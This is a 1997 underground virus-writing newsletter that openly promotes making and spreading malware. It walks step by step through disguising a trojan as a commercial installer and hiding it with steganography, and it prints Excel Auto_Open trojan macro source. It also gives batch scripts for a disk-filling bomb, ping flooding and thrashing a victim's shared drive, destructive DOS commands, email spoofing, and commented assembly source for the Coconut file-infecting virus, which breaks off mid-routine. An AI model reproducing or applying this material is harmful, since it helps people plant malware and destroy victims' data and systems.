Copy Link
Add to Bookmark
Report
God@rky's Virus Heaven Newsletter #3
God@rky's Virus Heaven Newsletter #3
Written by God@rky
(C)Circle-A Computers 1997 All Rights Reserved...
-----------------------------------------------------------------------------
**Warning** This magazine deals with Viruses, thier production, and
thier distribution, and frankly anything else that is virus related that we
wish to publish here. The ethics of this magazine's very existance my upset
you.
The intent of this magazine is to keep those interested in collecting
or authoring viruses up to date as well as we can with some of the information
that can be found here and abroad.
If you have any questions, comments, ideas or article submissions, by all
means send them via E-mail at: godarky@ilf.net
-----------------------------------------------------------------------------
CONTENTS
Section One - Introduction
Section Two - How To Hide Your Virus/Trojan by Virulent
Section Three - MS-Excel Shutdown Trojan
Section Four - An Intro To Basic Computer Anarchy &
The Techniques Involved
Section Five - Site News & Info
Section Six - Virus Heaven Hacked?!?!
Section Seven - The Browser Wars Become Uneven? Maybe...
Section Eight - A Small Virus Section
Section Nine - The End
=============================================================================
Introduction
Yeah... It's been a little while since I have been able to crank out
an issue of the Virus Heaven Newsletter. Those who have been e-mailing me
asking when the next issue would be out, know that the date has been
continually falling further and further behind.
The backlog started when I threw out some articles for Virus Bits &
Bytes magazine issue #4, and then continued through some upgrades on my
system as well as an increasingly larger amount of time I am having to
spend at work nowadays.
Since the First issue, I have been getting all kinds of submissions
for the newsletter. Some have been used in Virus Bits & Bytes Magazine #4,
others have been held for this somewhat special issue of the newsletter.
These are articles I was reluctant to publish due to the fact that
they dont really deal with viruses, but more the ilk of Trojans and other
forms of Malware. But due to the nature of the computer virus, I have
decided that these things belong on thier own shelf, and will thus have
thier own Issue, for the most part.
Most of this newsletter is reader's submissions. If they want to be
contacted, they will have left an e-mail address in thier submission.
Anyhow, Enjoy the issue, and I will keep you posted about the next
full scale issue to be released!
=============================================================================
SECTION - 2
How to Hide Your Virus/Trojan (Revisited)
=========================================
by Virulent (mdabrowski@juno.com)
*WARNING* This article contains info that might be offensive to some. May
I remind the reader, that in the United States, Canada, and the UK, virus
creation is not a crime. Frankly, it's legal everywhere except for Sweden
and Switzerland. The author disclaims any responsibility, blah, blah,
blah.
The author, however interested, doesn't condone the creation of
destructive viruses. He hates them himself. If you're gonna do it, he
does condone amusing viruses or ones with nifty visual displays.
*NOTES* Let it be known that I consider myself an AVer, as well as a
VXer. Any AVer that's not in the least bit way an VXer is just an AV
wannabe. Any VXer that isn't a tad bit an AVer is an idiot. If you're
around viruses as long as you might be, you're bound for infection. I have,
and I have been toasted by such wonderful creations as Natas. I have no ill
will against either community, and I love being a part of them both. If this
article angers anyone in the AV community, that's their problem. I believe
I'm making and will make lots of contributions to the field. Bug off.
I'd also like it to be known that, for one reason alone, I have
personal contempt for George Wenzel. I almost like most people in the AV
community. I have no ill will towards the moderator of alt.comp.virus.
Without him, alt.comp.virus would be flooded with make-money-fast posts and
such. Kudos.
My one reason for hating Mr. Wenzel is the fact that he likes to
complain about VXers to their ISPs. This is a mean and contemptuous practice
that must be stopped. No one should be "afraid" to post whatever they want
on the Net. If you've been "harassed" by Mr. Wenzel at any point, contact me.
I'd like to hear about it. And that's the only reason I dislike the man. I
think he does a fine job on producing the comp.virus mini-faq.
This has been my two-cent editorial on myself and those around
me. Read it and weep, compadre.
Necessary Software:
NUTILS20.ZIP - The Nowhere Utilities
Available everywhere. They're a must have for any power
user, not just those into viruses.
STEGANOS.ZIP - Steganos
Available in many places, or by contacting me.
It hides any file into a graphic, sound, or ASCII file.
Also will support new file types, if necessary.
=========================================
An article in CPI Newsletter Issue 2 starts, "So you've made the
most k-rad virus in the history of the world. So what do you do with the
damn thing?" This topic has been revisited by me, only because I've found
new techniques that must be told. I'll also go over many older
techniques, for the sake of completeness. For my ideas, the two pieces
of software above are necessary. I use both of them everyday, not just for
my viral needs.
I. The Basics
=============
Okay, here goes. The most basic way to hide a piece of viral
software is to simply infect any old piece of shareware and upload it to
a BBS or post it to a newsgroup. This is pretty pointless, especially for
viruses that are not encrypted in any way or just don't work. They also
get pointed out quickly, and you get flamed. Or George Wenzel gets your
account canceled, whatever floats your boat. You should feel like a
moron.
II. PKLITE Files - More Virus, Less Byte
========================================
Doing! A light goes on in your head. You decide to PKLITE the
file, remove the header, and then upload/post it. This may fool some
scanners, but the good ones may still catch it.
PKLITE reduces the size of a file. Viruses increase the size. If,
in the end, the PKLITEd infected file is smaller than the original, use
RESIZE, one of The Nowhere Utilities. That was Tip #1. In the end, even
if the end user doesn't have a good scanner, he still may notice the file
has changed, if:
1.) You haven't changed the size of the file in PACKING.LST or
what have you.
2.) There's no authentication on the ZIP file. This is especially
so for software from big name companies.
3.) The time/date stamp reads 1:05 a.m., Yesterday morning when
the rest of the files read 3:15. p.m., July 9th, 1994.
There are utilities around to solve these problems. Windows
Notepad will solve #1. A program - I can't remember the name - distributed
with an issue of 40Hex might solve #2. FIXTIME (A Nowhere Utility) will
solve #3.
Voila! The end user is completely fooled. Even though you may be
miles away, you can hear him/her swearing as his CMOS is wiped out, or
whatever.
You go into school the next day, and you get a note from a
friend. He needs a copy of ZeroBug.52086GFgbf?64, a new virus of which you
have one of the 4 copies in the world. George Wenzel got your friend's
account canceled, so he can't get it via e-mail. You decide to only way to
get it to him is through the school's BBS.
III. Getting that file to your Vx buddy
=======================================
It turns out the teacher running the BBS is a paranoid little
jerk that not only has 19 virus scanners scanning each upload, but personally
inspects each file for usual stuff. And they pay him for this! Since the
guy checks everything out, using the PKLITE technique ain't gonna help
you. Luckily, you and your friend picked up a copy of STEGANOS, either
from that brilliant article author, Virulent, or of some site on the Net.
You decide to hide Zerobug in a picture of your personal hero,
Bill Gates, or maybe that F-Prot wallpaper BMP Datafellows distributes.
STEGANOS is simply to use. The syntax is as such:
STEGANOS <e/d> <graphic/sound/ascii file> <file to hide> <password> </b>
</d>
E or D means encode or decode
/B means keep a backup of the original graphic file
/D means to delete the file you've just hidden.
It's pretty simple. So the jerk at school looks at your BMP of
Chairman Bill, and just sees some pixels with strange colors. "Hmm. Must
of had errors in the transfer." Your friend downloads the BMP and now
has a copy of the now infamous Zerobug variant. (BTW, Zerobug is a neat
virus, especially when you deliberately infect yourself to see the nifty
effect. :) )
IV. Can You Go Over That Again?
===============================
You may want to know EXACTLY how to do what I said in Section II,
so I'll go over the command-by-command play of me replacing a copy of
SoftRam, a Windows memory manager, with a trojan horse.
It turns out that the thing I've selected to replace SoftRam with
is a trojan, so I can't just infect the installation file. The setup's a
Windows program anyway, so it'll be futile. I'll have to replace SETUP.EXE
with the trojan. The trojan's name is Hemoroids, which I got off God@rky's
web site. Here's a DIR of the original files in the zip:
README WRI 20480 05-08-95 12:00p
SETUP EXE 273920 05-08-95 12:00p
SETUP INS 21085 05-08-95 12:00p
SETUP LGO 391 05-08-95 12:00p
SETUP PKG 193 05-08-95 12:00p
SRAM Z 95294 05-08-95 12:00p
SRAMRES DLL 15040 05-08-95 12:00p
~INS0763 LIB 7190 05-08-95 12:00p
IMORTAL1 ASC 1448 07-01-96 7:15p
HEMOROID EXE 2448 06-20-96 10:32p
IMORTAL1.ASC would be an ad for the BBS I downloaded it from,
which would be The Isles of the Immortals. (203-266-6079 8N1)
I'd then take HEMOROID.EXE, which is 2448 bytes. Due to the
271,472 byte difference between HEMOROID.EXE and SETUP.EXE, I can't just
rename HEMOROID.EXE. There's also the year time/date difference. So I'll
first RESIZE (A Nowhere Util) HEMOROID to the size of SETUP:
RESIZE -R 273920 HEMOROID.EXE
-R is so that the 270,000 some odd bytes put into HEMOROID aren't
all zeros, or it'll compress to around 5k. HEMOROID and SETUP are now the
same size. Now the time/date stamp:
FIXTIME 05-08-95 12:00 HEMOROID.EXE
The directory listing should look like this now:
README WRI 20480 05-08-95 12:00p
SETUP EXE 273920 05-08-95 12:00p
SETUP INS 21085 05-08-95 12:00p
SETUP LGO 391 05-08-95 12:00p
SETUP PKG 193 05-08-95 12:00p
SRAM Z 95294 05-08-95 12:00p
SRAMRES DLL 15040 05-08-95 12:00p
~INS0763 LIB 7190 05-08-95 12:00p
IMORTAL1 ASC 1448 07-01-96 7:15p
HEMOROID EXE 273920 05-08-95 12:00p
Good. Now you can rename HEMOROID to SETUP. But the dang project
isn't done yet. We need to PKZIP it up! Here's the two zip files.
SOFTRAM.ZIP is the original. SOFTRAMI.ZIP is the infected one. I've also
fixed the time/date stamp on SOFTRAMI.ZIP. The reason the ZIP's time/date
stamp is so new, is that, since I downloaded it from a BBS, a ZIP comment
was added, changing the date.
SOFTRAMI ZIP 394813 09-09-96 9:50p
IMORTAL1 ASC 1448 07-01-96 7:15p
SOFTRAM ZIP 371552 09-09-96 9:50p
IMORTAL1.ASC is our BBS comment file. Since the ZIPs aren't
relatively exact until we add the comment, I'll do it:
PKZIP -Z SOFTRAMI.ZIP < IMORTAL1.ASC
And I'll fix the time/date stamp again. Now SOFTRAMI.ZIP could
effectively pass as the original. And there's only a 23,261 byte size
difference. And no one usually runs FC (file compare) on two ZIPs like
that. Now you'd upload SOFTRAMI.ZIP (after renaming it and such) to your
favorite BBS, or post it to your favorite binaries newsgroup.
I never actually had SoftRam. It's a commercial program, so I had
someone who did have it send me a DIR of the files to work with. I
wouldn't use SoftRam as a trojan myself, considering there's more non-warez
newsgroups and BBSes then there are warez ones, and we're going for
maximum reach with the same file, eh?
V. Conclusion
=============
I've gone over a lot of techniques and such with you today, and I
hope you use them well. As always, I take no responsibility. I hope this
article sort of raises my standing in the Vx community, while not
lowering it in the Av community. If you have any thing to add to this
article, please e-mail me. If you have a flame, and are on a Unix-type
system, type it into a text file and move it to /dev/null.
In the future, I intend to write more articles and to possibly
come out with my own virus scanner to take out any virus on the WildList
or whatever. I hope to eventually even be one of the participants. If
you'd like to join me on any of my yet-to-be-infamous exploits, my e-mail
address is at the top of this article. Thanks, Virulent.
=============================================================================
SECTION - 3
MS-Excel Macro - Shutdown Trojan
The "shutdown.xls" is a trojan that although nondestructive is
sure to piss off and confuse the average Excel user. It contains an
Auto_Open macro which creates an ".xla" add-in file in the person's Excel
startup directory entitled "msexcel.xls" (sounds pretty innocent, kinda like
something you certainly wouldn't want to delete). The sole purpose of this
file is to close Excel. The first time you open shutdown.xls, it creates this
xla file then dissappears then shuts Excel off. Every time you try to open
Excel in the future, it starts to fire up then automatically opens the xla
file in the startup directory then shuts down. Until you delete the
msexcel.xls file in your startup directory, you will be unable to open Excel.
The beauty of an xla file is that you can't open it to see the contents.
Noone is going to want to delete something that the can't look at first
especially with a name lke msexcel.xls. If you want to create this yourself,
the source code to the macro is below. I have tested it using Excel 5 for
Win3.1 and Excel for Win95.
Sub Auto_Open()
Application.DisplayAlerts = False
Dim Start As String
Start = Application.StartupPath
ChDir Start
ExecuteExcel4Macro "VBA.MAKE.ADDIN(""msexcel.xla"")"
Application.Quit
End Sub
That's it! Just name the file "msexcel.xls" and you are done!
(Editor's Note): If you would like to see more of this guy's work, check out
the Yohimbe Excel Macro Virus that appeared in Virus Bits & Bytes Magazine
Issue #4.
=============================================================================
SECTION - 4
An Introduction to basic computer anarchy and the techniques involved
McNasty 1996
-----------------------------------------------------------------------------
Why am I writing this?
I'm writing this due to the fact that I'm always being asked to help people
who want to learn how to hack or how to create mayhem on other people's
computers and I'm sick of repeating myself.
I personally will accept no responsibility for any of the methods I describe
creating damage on someone else's computer. If you're gonna do it, take the
rap for it yerself!
I'll try to outline some methods you can use to really give people a hard
time if you feel fit.
Contents:
The Worm (and how to create a simple one using common ingredients found
around the home)
Tricks using DOS
FakeMail
Networking Havoc
That's about all for this first tutorial, if you want more just drop me a
line or give God@arky a shout and he'll pass it on.
1. The Worm
What is a worm?
A worm is a piece of code that basicaly replicates itself locally (not to
be confused with a virus...the worm does not transfer from host to host,
it just fucks up the computer it's run on)
For example a file that just gets bigger and bigger until you got no more
space left on your HDD. Sounds funky? it's dead easy to write and it's
spectacular when it goes off!
Imagine a 50k exe file that when it's run suddenly changes to 200MB and if
you aint got 200MB free on your HDD you got big problems!
Try this (i've already done so and it works fine and dandy)
I've left out important bits, but once you get the idea it shouldn't be
hard to suss out how to make it even worse.
Create a text file using edit (I usually create a file that's full of spaces
with the words "This space left intentionally blank" in the middle of the
page) and press enter until it's quite large. Hilight the lot and copy and
paste the text a few times until you have quite a large txt file then save
it.
Next write a batch file (called 1.bat or something like that) that copies
your txt file onto itself and keeps looping.
example:
:loop
copy stuff.txt stuff2.txt
copy stuff.txt+stuff2.txt stuff.txt
dir stuff.txt
goto loop
now run the bat file and watch it grow.....within a few minutes you've got a
HUGE txt file that basically says 'this space left intentionally blank'
When you've got a file sufficiently large enough (ie you've run out of disk
space!) you've got the fun bit......
Enter the PK family....
OK, right, now just point PKZIP at it and you'll see the txt file compress
to around 100k (depending on the compression type you use.....I've actually
had it to about 50k!)
Now you have a 100K zip file comtaining a 200MB txt file.....
Right, now run ZIP2EXE on it and turn it into an exe file et voila! instant
bomb!
You can adda few little extras here. There's a program in the nowhere
utilities that's a file padder. Run that and point it at your exe file to
make it exactly the same as a known file on the victim's computer. Then
plant it and sit back and watch the fireworks.
Another way of getting the victim to run the bomb is to get a copy of QBASIC
4.5 or VB and write a little program that looks like an installer, but
instead of installing it's doing damage. I got a guy with this and he was
running the installer for 20 mins. After he got bored of waiting he rebooted
only to find that his HDD was full of a HUGE txt file (he had a 1GB HDD) and
wouldn't boot 'cos the boot sector had been corrupted.
The hardest thing with a worm is actually getting the victim to run it. If
you use one of the ways I described it should make it a lot easier to dupe
your victim into committing HD Murder.
2. Tricks using DOS
Yeah yeah yeah I knwo what you're saying 'we use windows, why use dos?'.
Basically you can do a hellova lot more with a CLI than you can with a GUI
(at least at the moment you can) and it's easier to work with (as far as I'm
concerned!)
Some undocumented stuff to do in DOS (some of it good some of it not)
ONLY TRY THESE IF YOU WANT TO AND DON'T EVEN THINK ABOUT BLAMING ME IF YOU
FUCK UP YOUR COMPUTER!
Echo 123>clock$
This is a funky little command that overwrites your internal dos variable
clock$ and crashes your computer with a stack overflow. After rebooting you
will notice that your bios has been corrupted and depending on your bios,
all your settings have been filled with shit. Some BIOS's only get the date
and time corrupted, but some actually completely reset themselves (not nice
if your bios doesn't have a HD autodetect!)
There are all sorts of internal variables that you can overwrite with the
echo command. To get a list of these type mem/debug/p and see what you can
play with BUT BE CAREFUL!
the eternally famous deltree /y c:\windows
just deletes your windows directory without prompting for confirmation.
This also works with format too.
Attrib c:\command.com +h +s +r
means that you'll have to boot from floppy until you unhide command.com.
A handy thing to do (but you need a little time in private) is to run
PCTOOLS or norton hex editor and change the boot sector info on your or
your victim's HDD from NON bootable disk blah blah blah to "This disk has
been infected by the Good-Times Virus" then every time you format a floppy
from your computer the boot sectors of the disks you format wil have a
message about the goodtimes virus if you try to boot from them!
3. FakeMail (or how to confuse the hell out of lamers)
This is also very handy for stopping unwanted spam coming in by spammers
stealing your email address from the newsgroups.
In Netscape select Options, then Mail and News Preferences, then Identity
and change your return email address to whatever you want (I have been known
to make it the same email address as the vitim you want to hit with the
fakemail so when he replies he just spams himself!)
NOTE: This takes effect on the NEXT email you send, so if you've already
selected to send an email and then change your return address and identity
it will not take effect on that email.
BE AWARE OF THIS AS IT CAN GET YOU IN SOME SHIT IF YOU SEND OBNOXIOUS MAILS
THINKING YOU'VE REMOVED ALL TRACE OF YOUR IDENTITY.
Also, be aware of the fact that this is not untraceable, the only way of
sending untraceable email is either by using the port25 option in UNIX or
using an anonymous remailer (even then the remailer has an obligation to
give your details to the authorities if requested to do so in some
countries)
4. Networking Havoc
If you have a network in your office or school you can create all sorts of
mayhem. Here a few ways to do so.
Ping!
If your net transport is tcpip you can realy bring the network speed down by
ping flooding everyone. Find out the ip address of your victim(s) and then
just ping them continually from a bat file.
ie..
:loop
ping 127.0.0.1 (or the ip address of the victims terminal)
goto loop
and then run the batch file in the background.
In windows95/NT if you have tcpip networking you have ping in your windows
directory as well as a few other things like telnet, and tracert.
SwapFile Havoc!
If the victim on the network has a shared directory (ie to play network
doom etc..) you can really play hell with their computer.
Map the victim's directory
Create a new directory on the victims shared directory.
create a bat file on your computer like this. (I'll use doom as an example)
:loop
copy x:\doom.wad x:\new\doom.wad
del x:\doom.wad
copy x:\new\doom.wad x:\doom.wad
del x:\new\doom.wad
goto loop
Basically, this copies the doom.wad backwards and forwards between the
original directory and the new directory. Bearing in mind that the doom.wad
is about 15MB and is deleted when copied, the victim just sees his hard
drive going ballistic and all his processes slow down to a crawl because
he's having to share hard drive access between his swapfile and a remote
process (which doesn't affect the speed of your terminal!)
I did this to a victim and he ended up reformatting his HD because his
computer was running like a pig and hammering his HD all the time.
Another advantage of running stuff like this from a remote terminal is that
if you are about to be discovered, you can always swithc off the process.
Well, that's it for now. If you liked this, thanks. If you didn't, why did
you bother downloading it in the first place!
If you want more, let me know.
McNasty
=============================================================================
SECTION - 5
Site News & Info
By God@rky
Well there has been quite a bit of things going on in the VX world.
Perhaps I will remember it all, perhaps not.
One of the biggest additions to the Vx world recently was the
appearance of the West Coast Institute Of Virus Research (www.wcivr.com).
There has been much talk about this site, and I can see why. The site is
maintained by Falcon, and contains a very vast collection of Viruses.
In the newsgroup alt.comp.virus, there has been some squabbling over
wether or not the AV programs mentioned on the site detect the viruses or not.
Many of the viruses there are indeed detected. And I believe there will be
quite a few there that aren't currently detected. I personally don't have
the time to test my own site and collection, let alone Falcon's. And really,
what is it with the interest it has stirred up anyway of the AV folks. Since
when did they start caring whether claims a Vx site makes are true or not, or
for that matter backed by science? Get real. Anyways, the URL is;
http://www.wcivr.com
Give it a look-see, you may be surprised, and it may become a vastly used
bookmark in your browser.
The Virus Programming Instruction Page is back on-line with a new ISP,
Be sure and update your links to http://www.goodnet.com/~jwools/vir.htm
As many of you noticed (depending on where you picked up VBB Issue #4)
The VBB site has received a face-lift. Still in the same location, just
organized somewhat differently.
Received News awhile back, not sure if it is still available or not:
The Earth Crisis (203)753-3212 8N1
It runs a little slow on purpose. They have deliberately put up some
lame stuff to stop some people from calling. Supposed to be a HEAVY VX
BBS. Dunno, haven't had the desire to see my LD phone bill take a
rise recently, so I have not checked it out.
=============================================================================
SECTION - 6
Virus Heaven Hacked?!?!
By God@rky
I guess as many of you may have seen, The Virus Heaven Website was
hacked. The only damage done was visual, and simply remedied by re-loading
the HTML onto the site. Instead of the usual Anti-Censorship Garb that
appears on the graphics version of the site, the hacks left a "Microsoft
Nazis" logo there, and renamed the "40hex" zines to "40sex". As i said, it
was an uninspired easy hack, that was easily remedied. Then afterwords, I
was unable to access my E-mail or update the site. I am not sure if this
was do to Chaos changing my password (to prevent further hacks through my
account) and not informing me of the change, or if my account was hacked a
second time. The total time I was unable to update the site or check my
mail was exactly ONE MONTH.
Also, as many of you noticed, a week or two after my site was hacked,
The Alliance Virus Group page was hacked as well. The leftovers, at that
point named "The Alliance Virus Football Page" with links to a S.I.N. site
and some other site that escapes memory now, and captioned at the bottom,
"Hacked By DaFool".
During this time, I thought alot about the site I maintain, and the
Service/Disservice I provide the Internet Community. At one point, I became
tired of the entire commotion that comes about when you make viruses
available over the Internet. The size of the withdrawl's from my
precious wallet of spare time that the site made were quite large. I was
ready to end the site.
It was voiced by many, that DaFool, and who else hacked the ILF
Server were doing a great disservice to the entire hacking community, as
the server will provide a home, hassle free for such sites. Others stated
that it was probably a hack aimed at the Alliance for some kind of mental
masturbation in a "Hack-war" of some sorts. But then again, who really gives
a fuck, huh? The hack apparently provided a service, as security was upped at
ILF.
I have decided against shutting down the site for the time being.
I am not sure what made me change my mind to continue running the site...
Hell, who knows when it will change again. Many of the sites on ILF are now
gone. One of the hard drives was cleared, so they will be re-appearing in a
matter of time. But I thought it was important that I let you all know
why I wasn't responding to your mail or why the Virus Of the Month for
February were 2-3 months old.
=============================================================================
SECTION - 7
The Browser Wars Become Uneven? Maybe...
By God@rky
(NOTE: This article's primary reason for appearing in this issue, is
because of the possibuility made for WWW trojans)
We all have been witness to the battle between Microsoft and
Netscape. The battlefield? Primarily the WWW. The weapons? All the
plug-in's and processor bogging features you can (or in some cases CAN'T)
handle.
But a new weapon brought in by MicroSoft, may have backfired.
That weapon is known as ACTIVE-X. I am not going to go into the specifics
of ACTIVE-X's flaws or security holes, there will be an URL at the end of
this article which will take you to a site that will tell you everything
you wanted to know about the problems with Internet Explorer and Active-X.
Apparently Active-X makes it possible to run *ANY* program on the
client machine of the person who is viewing the page with the propper
Active-X malware scripted into it. I suppose this means that a "harmless"
viewing of your favorite web site can trigger the FORMAT command, or even
a virus (Vx dropper).
From everything I have read, this is not possible with Netscape (any
version). And from recent news, I guess Microsoft isn't planning on plugging
these security holes. But then why would they. They didn't make it any
harder to create Macro Viruses with Office 97 in either Excel or Word. Now
that there are more than 400 Word Macro Viruses alone, and probably quite a
few more being made each day, there isn't much they can do.
Here is the URL for the site that dives into the world of
Over-If-Not-Hyper-Active-X and Internet Explorer;
http://www.halcyon.com/mclain/ActiveX/
(Note: Not sure, as I don't use Internet Explorer, but I would recommend
using Netscape when you visit this site. <grin>)
=============================================================================
SECTION - 8
The Small Virus Section
Well I just didn't think it would be right to do an issue without
some sort of virus info in it, so here we are. Some of you are framiliar
with the King Lizard line of viruses (the Coconut family). Well here are
dooMSday's careful analysis of the first two coconut viruses, COCONUT-OW!
and COCONUT-AP!
; ------------------------------------------------------------------------
; THE COCONUT-AP! VIRUS
; (analysis: dooMSday)
;
; * direct action com-file infector (only if 128 < filesize < 60000 bytes
; and if filename is not '??MM????.COM' --> no COMMAND.COM infection)
; * tries to infect two files each time an infected file is executed
; * no date/time change
; * encrypted
; * debugger trap
; * activation date: Dec. 25th / Dec. 31st --> displays message
; * able to change directory (".." method)
; * signature "IN" at offset 0103h
; * virus author: @King Lizard
; ------------------------------------------------------------------------
.MODEL TINY
.RADIX 16
.CODE
ORG 100
START:
JMP VIR_ENTRY
DB 49,4E
;-------- original program code -----------
;
db 79 dup (90)
INT 20
;------------------------------------------
VIR_ENTRY:
CALL GET_IP
GET_IP:
MOV AX,4C00
SUB AH,22 ;AX=2Ah
INT 21 ;get Date
POP BP
PUSH DX
SUB BP,0108 ;BP=007Bh
CALL DECODE
POP DX
CMP DH,0C ;month=Dec. ?
JNZ LAB_02
CMP DL,19 ;day=25 ?
JZ LAB_01
CMP DL,1F ;day=31 ?
JNZ LAB_02
LAB_01:
CALL PAYLOAD
LAB_02:
CALL NEW_VECTOR
CALL RESTORE_BYTES
CALL PROC_2
CALL PROC_3
FIND_FIRST:
MOV AH,4Dh
INC AH ;AH=4Eh
MOV CX,0007
LEA DX,[BP+07EDh] ;(COM_STRING)
INT 21 ;Find First
JNB LAB_06
JMP LAB_05
LAB_07:
JMP LAB_03
LAB_06:
; file= '??MM????.COM' ?
CMP WORD PTR DS:[BP+08B3],4D4Dh
JZ LAB_07
;file length:
CMP WORD PTR DS:[BP+08ADh],0080
JB LAB_07 ; < 128 Bytes !
CMP WORD PTR DS:[BP+08ADh],60EA
JA LAB_07 ; > 60000 Bytes !
LEA DX,[BP+08B1]
MOV AX,4C00
SUB AX,08FF ;AX=4301h
SUB CX,CX
INT 21 ;set attrib.
JB LAB_07
MOV AX,4C00
SUB AX,0EFE ;AX=3D02h
LEA DX,[BP+08B1]
INT 21 ;open file
JB LAB_07
XCHG BX,AX ;BX=handle
MOV CX,0005
MOV AH,3F ;read file
LEA DX,[BP+0845] ;[ORIGINAL_BYTES]
INT 21
CMP WORD PTR DS:[BP+0848],4E49 ;signature ?
JZ LAB_07
CALL MOVE_POINTER
SUB AX,0003
MOV DS:[BP+0841],AX ;[P_JUMP+1]
MOV AX,4200 ;move file pointer
CWD
SUB CX,CX
INT 21
MOV CX,0005
MOV AH,3F
INC AH ;AH=40h
LEA DX,[BP+0840] ;(P_JUMP)
INT 21 ;write file
CALL MOVE_POINTER
CALL NEW_KEY
CALL ENCODE
MOV CX,074E
MOV AH,3F
INC AH ;AH=40h
LEA DX,[BP+0105] ;(VIR_ENTRY)
INT 21 ;write file
CALL DECODE
CALL PROC_4
LAB_05:
INC BYTE PTR DS:[BP+084F] ;[U_K]
CMP BYTE PTR DS:[BP+084F],02 ;[U_K]
JNZ LAB_03
MOV AX,4C00
SUB AH,32 ;AH=1Ah
MOV DX,0080
INT 21 ;set DTA Adr.
MOV AH,3Bh ;set directory
LEA DX,[BP+0852] ;(P_DIRECTORY)
INT 21
CALL RESTORE_VECTOR
MOV BX,0101
DEC BX
JMP BX ;Jump 0100
LAB_03:
CALL PROC_4
MOV AH,50
DEC AH ;AH=4Fh
INT 21 ;find next
JB LAB_04
JMP LAB_06
LAB_04:
MOV AH,3Bh ;set directory
LEA DX,[BP+084A] ;(PARENT_DIR)
INT 21
JB LAB_05
JMP FIND_FIRST
MOVE_POINTER:
MOV AX,4202 ;move file pointer
CWD
SUB CX,CX
INT 3
RET
NEW_VECTOR:
CLI
PUSH DS
XOR AX,AX
MOV DS,AX ;DS=0000h
MOV AX,word ptr[offset start-00F4] ;get Int 03h offset
;and save it
MOV CS:[BP+083C],AX ;[INT_3_OFFSET]
MOV AX,word ptr[offset start-00F2] ;get Int 03h segment
;and save it
MOV CS:[BP+083E],AX ;[INT_3_SEGMENT]
MOV AX,word ptr[offset start-007C] ;get Int 21h offset
MOV word ptr[offset start-00F4],AX ;copy to Int 3 offset
MOV AX,word ptr[offset start-007A] ;get Int 21h segment
MOV word ptr[offset start-00F2],AX ;copy to Int 3 segment
POP DS
STI
RET
RESTORE_BYTES:
LEA SI,[BP+0845] ;[ORIGINAL_BYTES]
MOV DI,0100
MOVSW
MOVSW
MOVSB
RET
PROC_2:
MOV BYTE PTR DS:[BP+084F],00
RET
PROC_3:
MOV AH,47 ;get directory
SUB DL,DL
LEA SI,[BP+0853] ;(P_DIRECTORY +1)
INT 3
MOV AH,1A ;set DTA adr.
LEA DX,[BP+0893] ;(P_DIRECTORY +65d)
INT 3
RET
RESTORE_VECTOR:
CLI
PUSH DS
XOR AX,AX
MOV DS,AX
MOV AX,CS:[BP+083C] ;[INT_3_OFFSET]
MOV word ptr[offset start-00F4],AX ;=000Ch
MOV AX,CS:[BP+083E] ;[INT_3_SEGMENT]
MOV word ptr[offset start-00F2],AX ;=000Eh
POP DS
STI
RET
NEW_KEY:
MOV AH,2C ;get time
INT 3
CMP DX,+00
JZ NEW_KEY
MOV DS:[BP+0850],DX ;[P_KEY]
RET
PROC_4:
SUB CX,CX
MOV CL,DS:[BP+08A8]
LEA DX,[BP+08B1]
MOV AX,4301 ;set attrib.
INT 3
MOV CX,DS:[BP+08A9]
MOV DX,DS:[BP+08ABh]
MOV AX,5701 ;set file date/time
INT 3
MOV AH,3E ;close file
INT 3
RET
PAYLOAD:
SUB CX,CX
MOV DX,314F
MOV BX,0700
MOV AX,0600 ;CLS
INT 10
MOV AH,05 ;activate screen page 0
INT 10
MOV AX,1112 ;8*8
SUB BL,BL
INT 10
MOV AH,12 ;?
MOV BL,20
INT 10
MOV AH,09 ;display String
LEA DX,[BP+02EDh] ;(MESSAGE)
INT 21
INT 20 ;exit
RET
;------------------------------------------- DATA
AUTHOR DB '[by @King Lizard]'
MESSAGE DB 0Dh,0A, ' ooooo@@@@@@@@@@@@@ooooo'
DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A, ' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o'
DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o'
DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o'
DB 0Dh,0A, ' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@'
DB 0Dh,0A, ' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@'
DB 0Dh,0A, '@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A, ' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@'
DB 0Dh,0A, ' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@'
DB 0Dh,0A, ' @@@o "@@@"@@@@@@"@@@" o@@@'
DB 0Dh,0A, ' @@@@o @ @ o@@@"'
DB 0Dh,0A, ' "@@@@o o@@@@'
DB 0Dh,0A, ' "@@@@@o @ @ o@@@@@"'
DB 0Dh,0A, ' ""@@@@@o@@@oooooooo@@@o@@@@@""'
DB 0Dh,0A, ' ""@@@@@@@@@@@@@@@@@@@@""'
DB 0Dh,0A, ' ""@@@@@@@@@@@@@""'
DB 0Dh,0A, ' '
DB 0Dh,0A, ' * *'
DB 0Dh,0A, ' *** ***'
DB 0Dh,0A, ' ***** Virus coconut wishes you a merry *****'
DB 0Dh,0A, '******* christmas and a happy new year!! *******'
DB 0Dh,0A, ' * *'
DB 0Dh,0A, ' * *'
DB 0Dh,0A,'$'
;
COM_STRING DB '*.COM',0
;
ENCODE:
CALL PROC_1
LAB_ENCODE_01:
CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT]
DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT]
JB LAB_08
LODSW
ROR AX,CL
XOR AX,CX
ADD AX,CX
STOSW
JMP LAB_ENCODE_01
LAB_08:
RET
PROC_1:
MOV WORD PTR DS:[BP+084Dh],02EC ;[P_COUNT]
LEA SI,[BP+021Bh] ;(MOVE_POINTER)
MOV CX,DS:[BP+0850] ;[P_KEY]
MOV DI,SI
RET
DECODE:
CALL PROC_1
